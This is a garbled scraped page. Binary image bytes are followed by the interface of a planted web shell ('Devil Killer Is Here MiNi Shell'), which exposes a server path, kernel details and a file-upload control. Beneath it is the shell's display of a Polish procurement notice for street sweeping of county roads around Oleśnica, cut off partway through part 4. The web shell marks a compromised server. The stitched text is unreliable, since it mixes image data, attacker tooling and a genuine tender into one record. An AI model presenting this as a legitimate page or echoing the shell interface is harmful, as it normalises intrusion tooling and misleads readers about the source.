JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250314/0014692201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług w zakresie utrzymania dróg powiatowych - zamiatania <br/>dla Zarządu Dróg Powiatowych w Oleśnicy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD DRÓG POWIATOWYCH W OLEŚNICY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931963210</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wojska Polskiego 52C</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oleśnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">56-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdp@zdp-olesnica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.bip.zdp-olesnica.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> pełnienie funkcji zarządcy dróg powiatowych w rozumieniu przepisów ustawy o drogach </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług w zakresie utrzymania dróg powiatowych - zamiatania <br/>dla Zarządu Dróg Powiatowych w Oleśnicy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4fedf3a0-5e83-4eba-999e-f998eff5b3da</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00146922</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00052237/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Świadczenie usług w zakresie letniego utrzymania dróg - zamiatanie ulic dla Zarządu Dróg Powiatowych w Oleśnicy w roku 2025</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1076428 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/1076428</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, odbywa się wyłącznie za pośrednictwem Platformy zakupowej dostępnej pod adresem https://platformazakupowa.pl/pn/zdp_olesnica zwanej dalej „Platformą zakupową”. 2. Zamawiający będzie przekazywał Wykonawcom informacje za pośrednictwem Platforma zakupowa Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana za pośrednictwem Platforma zakupowa do konkretnego Wykonawcy. 3. Zamawiający, zgodnie z § 11 ust. 2 ROZPORZĄDZENIE PREZESA RADY MINISTRÓW z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem Platformy zakupowej, tj.: 1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, 2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, 3) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer, 4) włączona obsługa JavaScript, 5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, 6) platforma zakupowa działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8, 7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. 3. Szczegółowe informacje zostały zawarte w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zapisy dotyczące ochrony danych osobowych zebranych przez Zamawiającego w toku postępowania zostały zawarte w rozdziale XXI SWZ (Ochrona danych osobowych).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP-DZP.252.6.2025.MM-B</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zadanie nr 1 – drogi powiatowe na terenie gminy Dobroszyce:<br/>Zamiatanie dróg powiatowych w poniższych lokalizacjach: <br/>- droga powiatowa nr 1477D m. Nowica, m. Dobroszyce ul. Kolejowa, ul. Lipowa, ul. Oleśnicka – jezdnia 2250 mb + chodnik 2550mb.<br/>- droga powiatowa nr 1480D m. Dobroszyce ul. Trzebnicka, ul. 11 Listopada, ul. Wrocławska – jezdnia 2150 mb + chodnik 2400mb<br/>Dodatkowe odcinki dróg powiatowych do zamiatania nr 1.<br/>- droga powiatowa nr 1472D m. Dobra, m. Dobrzeń - jezdnia 1300,0 mb + chodnik 870 mb.<br/>Razem:<br/>do zamiatania nr 1: jezdnia 5700,0 mb + chodnik 5820,0 mb = 11520,0 mb<br/>do zamiatania nr 2,3,4: jezdnia 4400,0 mb<br/>2. ZAKRES PRAC DLA ZADANIA 1 oraz termin realizacji<br/>Zadanie nr 1 obejmuje :<br/>Zamiatanie nr 1: <br/>a)	zamiatanie ręczne lub mechaniczne chodników, ścieżek rowerowych lub pieszo-rowerowych na całej szerokości chodnika, ścieżki rowerowej lub pieszo-rowerowej wraz z usunięciem ziemi i darniny.<br/>b) zamiatanie ręczne lub mechaniczne ulic na szerokości 1m przy chodnikach, krawężnikach, ściekach korytkowych, wysepkach zlokalizowanych w osi jezdni na rondach, przejściach dla pieszych, martwych polach wyłączonych z ruchu zlokalizowanych w osi jezdni, oraz zatokach autobusowych, postojowych przylegających bezpośrednio do krawędzi jezdni na całej ich powierzchni. <br/>c)	Termin wykonania zamiatania: od dnia podpisania umowy do dnia 30 kwietnia 2025r., odcinki dodatkowe do dnia 30 czerwca 2025r. <br/>Zamiatania nr 2,3, 4:<br/>a)	zamiatanie ręczne lub mechaniczne ulic na szerokości 1m przy chodnikach, krawężnikach, ściekach korytkowych, wysepkach zlokalizowanych w osi jezdni na rondach, przejściach dla pieszych, martwych polach wyłączonych z ruchu zlokalizowanych w osi jezdni, oraz zatokach autobusowych, postojowych przylegających bezpośrednio do krawędzi jezdni na całej ich powierzchni. <br/>b)	Terminy wykonania zamiatania:<br/>Zamiatanie nr 2 - do 30 czerwca 2025r. <br/>Zamiatanie nr 3 - do 31 sierpnia 2025r. <br/>Zamiatanie nr 4 - do 31 października 2025r. <br/>3. Utylizacja piasku, ziemi, trawy powstałej w wyniku zamiatania ulic, chodników i ścieżek rowerowych po stronie Wykonawcy.<br/>4. Przedmiot zamówienia, zakres usługi oraz obowiązki Wykonawcy szczegółowo opisane są w:<br/>1) SWZ;<br/>2) projekcie umowy (załącznik nr 1 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90610000-6 - Usługi sprzątania i zamiatania ulic</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90611000-3 - Usługi sprzątania ulic</p> <p class="mb-0">90612000-0 - Usługi zamiatania ulic</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zadanie nr 2 – zamiatanie dróg powiatowych na ternie miasta i gminy Twardogóra:<br/>Zamiatanie dróg powiatowych na terenie m. Twardogóra, w poniższych lokalizacjach:<br/>- droga powiatowa nr 1470 D ul. Oleśnicka, ul. 1 Maja – jezdnia 1820 mb + chodnik 1820 mb<br/>- droga powiatowa nr 1480 D ul. Wrocławska – jezdnia 2400 mb + chodnik (ciąg pieszo-rowerowy) 3455 mb<br/>- droga powiatowa nr 1451 D ul. Trzebnicka – jezdnia 660 mb + chodnik 660 mb;<br/>- droga powiatowa nr 1479 D ul. Leśna – jezdnia 1190 mb + chodnik1190 mb <br/>Dodatkowe odcinki dróg powiatowych do zamiatania nr 1 gmina Twardogóra:<br/>- droga powiatowa nr 1470D Sądrozyce – jezdnia 1765 mb + chodnik 1765 mb<br/>- droga powiatowa nr 1470D Drogoszowice – jezdnia 580 mb + chodnik (ścieżka rowerowa) 1560 mb<br/>- droga powiatowa nr 1470D Sosnówka – jezdnia 900 mb + chodnik 900 mb<br/>- droga powiatowa nr 1451D Grabowno Małe – jezdnia 2310 mb + chodnik 2310 mb<br/>- droga powiatowa nr 1480D Grabowno Wielkie – jezdnia 790 mb + chodnik 1015 mb<br/>- droga powiatowa nr 1482D ul. Korfantego Goszcz – jezdnia 570 mb + chodnik 80 mb<br/>- droga powiatowa nr 1490D ul. Sycowska Goszcz – jezdnia 520 mb + chodnik 520 mb<br/>- droga powiatowa nr 1465D Chełstówek – Chełstów - jezdnia 1800 mb + chodnik 1800 mb<br/>Razem:<br/>do zamiatania nr 1 - jezdnia 15 305 mb + chodnik 17 075 mb = 32 380 mb<br/>do zamiatanie nr 2, 3, 4: - jezdnia 6 070 mb<br/>2. ZAKRES PRAC DLA ZADANIA 2 oraz termin realizacji<br/>Zadanie nr 2 obejmuje :<br/>Zamiatanie nr 1: <br/>a)	zamiatanie ręczne lub mechaniczne chodników, ścieżek rowerowych lub pieszo-rowerowych na całej szerokości chodnika, ścieżki rowerowej lub pieszo-rowerowej wraz z usunięciem ziemi i darniny.<br/>b) zamiatanie ręczne lub mechaniczne ulic na szerokości 1m przy chodnikach, krawężnikach, ściekach korytkowych, wysepkach zlokalizowanych w osi jezdni na rondach, przejściach dla pieszych, martwych polach wyłączonych z ruchu zlokalizowanych w osi jezdni, oraz zatokach autobusowych, postojowych przylegających bezpośrednio do krawędzi jezdni na całej ich powierzchni. <br/>c)	Termin wykonania zamiatania: od dnia podpisania umowy do dnia 30 kwietnia 2025r., odcinki dodatkowe do dnia 30 czerwca 2025r. <br/>Zamiatania nr 2,3, 4:<br/>a)	zamiatanie ręczne lub mechaniczne ulic na szerokości 1m przy chodnikach, krawężnikach, ściekach korytkowych, wysepkach zlokalizowanych w osi jezdni na rondach, przejściach dla pieszych, martwych polach wyłączonych z ruchu zlokalizowanych w osi jezdni, oraz zatokach autobusowych, postojowych przylegających bezpośrednio do krawędzi jezdni na całej ich powierzchni. <br/>b)	Terminy wykonania zamiatania:<br/>Zamiatanie nr 2 - do 30 czerwca 2025r. <br/>Zamiatanie nr 3 - do 31 sierpnia 2025r. <br/>Zamiatanie nr 4 - do 31 października 2025r. <br/>3. Utylizacja piasku, ziemi, trawy powstałej w wyniku zamiatania ulic, chodników i ścieżek rowerowych po stronie Wykonawcy.<br/>4. Przedmiot zamówienia, zakres usługi oraz obowiązki Wykonawcy szczegółowo opisane są w:<br/>1) SWZ;<br/>2) projekcie umowy (załącznik nr 1 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90610000-6 - Usługi sprzątania i zamiatania ulic</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90611000-3 - Usługi sprzątania ulic</p> <p class="mb-0">90612000-0 - Usługi zamiatania ulic</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zadanie nr 3 – drogi powiatowe na terenie miasta i gminy Syców:<br/>Zamiatanie dróg powiatowych na terenie m. Syców w poniższych lokalizacjach:<br/>- droga powiatowa nr 1500D ul. Oleśnicka, ul. Kolejowa – jezdnia 4475 mb chodnik 4475 mb<br/>- droga powiatowa nr 1496 D ul. Daszyńskiego – jezdnia 2140 mb + chodnik 2140 mb<br/>- droga powiatowa nr 1495 D ul. Komorowska – jezdnia 2115 mb + chodnik 2115 mb<br/>- droga powiatowa nr 1502 D ul. Polna – jezdnia 745 mb + chodnik 745 mb;<br/><br/>Dodatkowe odcinki dróg powiatowych do zamiatania nr 1 gmina Syców:<br/>- droga powiatowa nr 1500D Syców ul. Kolejowa - Ślizów – jezdnia 2055 mb + chodnik 2055 mb<br/>- droga powiatowa nr 3502D (dawna DK8) Stradomia Wierzchnia – jezdnia 950 mb + chodnik 950 mb<br/>- droga powiatowa nr 3502D (dawna DK8) Gaszowice – jezdnia 1645 mb + chodnik 1645 mb<br/>- droga powiatowa nr 1499D Stradomia Wierzchnia – jezdnia 1340 mb + chodnik 2285 mb<br/>- droga powiatowa nr 1495D, 1490D Komorów – jezdnia 460 mb + chodnik 460 mb<br/>- droga powiatowa nr 1498D Szczodrów – jezdnia 255 mb + chodnik 255 mb<br/>Razem:<br/>do zamiatania nr 1: jezdnia 16 180 mb + chodnik 17 125 mb = 33 305 mb<br/>do zamiatania nr 2, 3, 4: jezdnia 9475 mb <br/>2. ZAKRES PRAC DLA ZADANIA 3 oraz termin realizacji<br/>Zadanie nr 3 obejmuje :<br/>Zamiatanie nr 1: <br/>a)	zamiatanie ręczne lub mechaniczne chodników, ścieżek rowerowych lub pieszo-rowerowych na całej szerokości chodnika, ścieżki rowerowej lub pieszo-rowerowej wraz z usunięciem ziemi i darniny.<br/>b) zamiatanie ręczne lub mechaniczne ulic na szerokości 1m przy chodnikach, krawężnikach, ściekach korytkowych, wysepkach zlokalizowanych w osi jezdni na rondach, przejściach dla pieszych, martwych polach wyłączonych z ruchu zlokalizowanych w osi jezdni, oraz zatokach autobusowych, postojowych przylegających bezpośrednio do krawędzi jezdni na całej ich powierzchni. <br/>c)	Termin wykonania zamiatania: od dnia podpisania umowy do dnia 30 kwietnia 2025r., odcinki dodatkowe do dnia 30 czerwca 2025r. <br/><br/>Zamiatania nr 2,3, 4:<br/>a)	zamiatanie ręczne lub mechaniczne ulic na szerokości 1m przy chodnikach, krawężnikach, ściekach korytkowych, wysepkach zlokalizowanych w osi jezdni na rondach, przejściach dla pieszych, martwych polach wyłączonych z ruchu zlokalizowanych w osi jezdni, oraz zatokach autobusowych, postojowych przylegających bezpośrednio do krawędzi jezdni na całej ich powierzchni. <br/>b)	Terminy wykonania zamiatania:<br/>Zamiatanie nr 2 - do 30 czerwca 2025r. <br/>Zamiatanie nr 3 - do 31 sierpnia 2025r. <br/>Zamiatanie nr 4 - do 31 października 2025r. <br/>3. Utylizacja piasku, ziemi, trawy powstałej w wyniku zamiatania ulic, chodników i ścieżek rowerowych po stronie Wykonawcy.<br/>4. Przedmiot zamówienia, zakres usługi oraz obowiązki Wykonawcy szczegółowo opisane są w:<br/>1) SWZ;<br/>2) projekcie umowy (załącznik nr 1 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90610000-6 - Usługi sprzątania i zamiatania ulic</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90611000-3 - Usługi sprzątania ulic</p> <p class="mb-0">90612000-0 - Usługi zamiatania ulic</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zadanie nr 4 – drogi powiatowe na terenie miasta i gminy Bierutów :<br/>Zamiatanie dróg w m. Bierutów, w poniższych lokalizacjach:<br/>-	droga powiatowa nr 1463D ul. Solnicka – jezdnia 100mb + chodnik 100 mb<br/>-	droga powiatowa nr 3500D ul. Słowackiego – 